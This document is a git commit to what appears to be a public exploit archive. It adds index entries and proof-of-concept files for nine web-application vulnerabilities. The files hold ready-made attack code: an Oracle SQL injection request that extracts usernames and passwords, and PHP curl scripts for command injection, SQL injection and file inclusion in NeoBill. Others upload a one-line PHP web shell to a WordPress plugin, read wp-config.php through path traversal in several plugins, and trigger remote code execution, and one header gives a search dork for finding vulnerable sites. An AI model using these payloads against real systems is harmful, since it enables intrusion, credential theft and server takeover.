DB: 2015-12-05

9 new exploits
2015-12-05 05:02:44 +00:00 · 2015-12-05 05:02:44 +00:00 · dc50223dc2
commit dc50223dc2
parent e2ec70e343
10 changed files with 347 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35099,6 +35099,7 @@ id,file,description,date,author,platform,type,port
 38827,platforms/php/remote/38827.txt,"Nagios XI 'tfPassword' Parameter SQL Injection Vulnerability",2013-12-13,"Denis Andzakovic",php,remote,0
 38828,platforms/php/webapps/38828.php,"Limonade framework 'limonade.php' Local File Disclosure Vulnerability",2013-11-17,"Yashar shahinzadeh",php,webapps,0
 38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote SEH Buffer Overflow (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0
+38830,platforms/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection Vulnerability",2015-11-30,"Persian Hack Team",php,webapps,80
 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0
 38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - abrt/sosreport Local Root",2015-12-01,rebel,linux,local,0
 38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Aaccess (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0
@ -35127,3 +35128,11 @@ id,file,description,date,author,platform,type,port
 38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability",2015-12-03,metasploit,windows,remote,7777
 38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,metasploit,windows,remote,7777
 38861,platforms/php/webapps/38861.txt,"WordPress Gwolle Guestbook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0
+38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS 'thisday' Parameter SQL Injection Vulnerability",2013-12-06,xin.wang,php,webapps,0
+38863,platforms/php/webapps/38863.php,"NeoBill /modules/nullregistrar/phpwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0
+38864,platforms/php/webapps/38864.php,"NeoBill /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
+38865,platforms/php/webapps/38865.txt,"NeoBill /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
+38867,platforms/php/webapps/38867.txt,"Wordpress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
+38868,platforms/php/webapps/38868.txt,"Wordpress Plugin Sell Download v1.0.16  - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
+38869,platforms/php/webapps/38869.txt,"Wordpress Plugin TheCartPress v1.4.7  - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
+38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection Vulnerability",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0
--- a/platforms/php/webapps/38830.txt
+++ b/platforms/php/webapps/38830.txt
@ -0,0 +1,23 @@
+######################
+# Exploit Title : MyCustomers Cms Sql Injection Vulnerability
+# Exploit Author : Persian Hack Team
+# Vendor Homepage : http://www.iran-php.com/
+# Google Dork : "Powered By IranPHP" & inurl:/index.php?DPT=IP17 & "Powered+by+MyCustomers-1.3.873"
+# Date: 2015/11/28
+# Version :  1.3
+# 
+######################
+# Vulnerable Paramter DPT=
+# Demo:
+# http://server/index.php?DPT=IP17%27
+#
+# Youtube : https://www.youtube.com/watch?v=43DVOq5L2hw
+#
+# We reported to vendor but Anyone not responsive
+# It's not joke
+# We do not take responsibility
+#
+######################
+# Discovered by : 
+# Mojtaba MobhaM & T3NZOG4N (t3nz0g4n@yahoo.com)
+######################  
--- a/platforms/php/webapps/38862.txt
+++ b/platforms/php/webapps/38862.txt
@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/64110/info
+
+Enorth Webpublisher is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+POST /pub/m_worklog/log_searchday.jsp HTTP/1.1
+Host: www.example.com
+User-Agent:
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-cn
+Accept-Encoding: gzip, deflate
+Cookie:
+Pragma: no-cache
+Proxy-Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 180
+thisday=20131012') and UTL_INADDR.get_host_name((select v from (select rownum,USER_NAME||chr(94)||PASS_WORD v from TN_USER WHERE USER_ID=1) where rownum=1))>0--&cx.y=16&querytype= 
--- a/platforms/php/webapps/38863.php
+++ b/platforms/php/webapps/38863.php
@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/64112/info
+
+NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
+
+NeoBill 0.9-alpha is vulnerable; other versions may also be affected. 
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://[target]/modules/nullregistrar/phpwhois/example.php?query=[CMD]");
+curl_setopt($ch, CURLOPT_HTTPGET, 1);
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
--- a/platforms/php/webapps/38864.php
+++ b/platforms/php/webapps/38864.php
@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/64112/info
+ 
+NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
+ 
+NeoBill 0.9-alpha is vulnerable; other versions may also be affected. 
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://[target]/install/include/solidstate.php");
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+curl_setopt($ch, CURLOPT_POSTFIELDS, "username='[SQLi]&firstname='[SQLi]&email='[SQLi]"); // or inject in only one ;)
+curl_setopt($ch, CURLOPT_COOKIE, "language='[SQLi]"); // SQLi via Cookie
+curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_[target]"); // add cookie-jar header to exploit it ^^
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
--- a/platforms/php/webapps/38865.txt
+++ b/platforms/php/webapps/38865.txt
@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/64112/info
+  
+NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
+  
+NeoBill 0.9-alpha is vulnerable; other versions may also be affected. 
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://[target]/install/index.php");
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+curl_setopt($ch, CURLOPT_POST, 1);
+curl_setopt($ch, CURLOPT_POSTFIELDS, "language=[LFI]%00"); // LFI 1
+curl_setopt($ch, CURLOPT_COOKIE, "language=[LFI]%00"); // LFI 2 ( via cookie ^^ )
+curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_[target]");
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
--- a/platforms/php/webapps/38867.txt
+++ b/platforms/php/webapps/38867.txt
@ -0,0 +1,88 @@
+###########################################
+#-----------------------------------------#
+#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
+#-----------------------------------------#
+#     *----------------------------*      #
+#  K  |....##...##..####...####....|  .   #
+#  h  |....#...#........#..#...#...|  A   #
+#  a  |....#..#.........#..#....#..|  N   #
+#  l  |....###........##...#.....#.|  S   #
+#  E  |....#.#..........#..#....#..|  e   #
+#  D  |....#..#.........#..#...#...|  u   #
+#  .  |....##..##...####...####....|  r   #
+#     *----------------------------*      #
+#-----------------------------------------#
+#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
+#-----------------------------------------#
+###########################################
+# >>    D_x . Made In Algeria . x_Z    << #
+###########################################
+#
+# [>] Title : Wordpress Plugin Advanced uploader v2.10 Multiple Vulnerabilities
+#
+# [>] Author : KedAns-Dz
+# [+] E-mail : ked-h (@hotmail.com)
+# [+] FaCeb0ok : fb.me/K3d.Dz
+# [+] TwiTter : @kedans
+#
+# [#] Platform : PHP / WebApp
+# [+] Cat/Tag : File Upload / Code Exec / Disclosure
+#
+# [<] <3 <3 Greetings t0 Palestine <3 <3
+# [!] Vendor : http://www.wordpress.org
+#
+###########################################
+#
+# [!] Description :
+#
+# Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities
+# remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.
+#
+####
+
+<?php
+// page : upload.php
+// lines : 1030... 1037
+
+$postData = array();
+$postData['file'] = "@k3d.php";
+/* k3d.php : <?php system($_GET["dz"]); ?> */
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http:/[target].com/wp-content/plugins/advanced-uploader/upload.php");
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+curl_setopt($ch, CURLOPT_POST, 1);
+curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
+?>
+
+##################
+
+<?php
+// page : upload.php
+// lines : 1219... 1237
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00");
+curl_setopt($ch, CURLOPT_HTTPGET, 1);
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
+?>
+
+####
+#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
+#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
+#---------------------------------------------------------------
+# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
+# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
+# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
+# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
+# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
+# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
+# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
+####
--- a/platforms/php/webapps/38868.txt
+++ b/platforms/php/webapps/38868.txt
@ -0,0 +1,68 @@
+###########################################
+#-----------------------------------------#
+#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
+#-----------------------------------------#
+#     *----------------------------*      #
+#  K  |....##...##..####...####....|  .   #
+#  h  |....#...#........#..#...#...|  A   #
+#  a  |....#..#.........#..#....#..|  N   #
+#  l  |....###........##...#.....#.|  S   #
+#  E  |....#.#..........#..#....#..|  e   #
+#  D  |....#..#.........#..#...#...|  u   #
+#  .  |....##..##...####...####....|  r   #
+#     *----------------------------*      #
+#-----------------------------------------#
+#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
+#-----------------------------------------#
+###########################################
+# >>    D_x . Made In Algeria . x_Z    << #
+###########################################
+#
+# [>] Title : Wordpress Plugin Sell Download v1.0.16 Local File Disclosure Vulnerability
+#
+# [>] Author : KedAns-Dz
+# [+] E-mail : ked-h (@hotmail.com)
+# [+] FaCeb0ok : fb.me/K3d.Dz
+# [+] TwiTter : @kedans
+#
+# [#] Platform : PHP / WebApp
+# [+] Cat/Tag : File Disclosure
+#
+# [<] <3 <3 Greetings t0 Palestine <3 <3
+# [!] Vendor : http://wordpress.dwbooster.com/content-tools/sell-downloads
+#
+###########################################
+#
+# [!] Description :
+#
+# Wordpress plugin Sell Download v1.0.16 is suffer from Local File Disclosure Vulnerability
+# remote attacker can disclosure some local files.
+#
+####
+
+<?php
+// page : sell-downloads.php
+// lines : 119, 130.. 131
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php%00");
+curl_setopt($ch, CURLOPT_HTTPGET, 1);
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
+?>
+
+####
+#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
+#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
+#---------------------------------------------------------------
+# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
+# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
+# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
+# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
+# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
+# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
+# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
+####
--- a/platforms/php/webapps/38869.txt
+++ b/platforms/php/webapps/38869.txt
@ -0,0 +1,81 @@
+###########################################
+#-----------------------------------------#
+#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
+#-----------------------------------------#
+#     *----------------------------*      #
+#  K  |....##...##..####...####....|  .   #
+#  h  |....#...#........#..#...#...|  A   #
+#  a  |....#..#.........#..#....#..|  N   #
+#  l  |....###........##...#.....#.|  S   #
+#  E  |....#.#..........#..#....#..|  e   #
+#  D  |....#..#.........#..#...#...|  u   #
+#  .  |....##..##...####...####....|  r   #
+#     *----------------------------*      #
+#-----------------------------------------#
+#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
+#-----------------------------------------#
+###########################################
+# >>    D_x . Made In Algeria . x_Z    << #
+###########################################
+#
+# [>] Title : Wordpress Plugin TheCartPress v1.4.7 Multiple Vulnerabilities
+#
+# [>] Author : KedAns-Dz
+# [+] E-mail : ked-h (@hotmail.com)
+# [+] FaCeb0ok : fb.me/K3d.Dz
+# [+] TwiTter : @kedans
+#
+# [#] Platform : PHP / WebApp
+# [+] Cat/Tag : Multiple
+#
+# [<] <3 <3 Greetings t0 Palestine <3 <3
+# [!] Vendor : http://thecartpress.com
+#
+###########################################
+#
+# [!] Description :
+#
+# Wordpress plugin TheCartPress v1.4.7 is suffer from multiple vulnerabilities
+# remote attacker can disclosure some local files or do a remote code execution.
+#
+####
+
+// page : Miranda.class.php
+// lines : 111.. 115
+
+/* --[1] Local File Include -- */
+<?php
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00");
+curl_setopt($ch, CURLOPT_HTTPGET, 1);
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
+?>
+
+/* --[2] Remote Code Execution -- */
+<?php
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=[RCE]");
+curl_setopt($ch, CURLOPT_HTTPGET, 1);
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+$buf = curl_exec ($ch);
+curl_close($ch);
+unset($ch);
+echo $buf;
+?>
+
+####
+#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
+#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
+#---------------------------------------------------------------
+# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
+# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
+# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
+# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
+# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
+# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
+# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
+####
--- a/platforms/php/webapps/38870.txt
+++ b/platforms/php/webapps/38870.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64167/info
+
+WordPress Easy Career Openings plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/career-details/?jobid=3'[Sql Injection]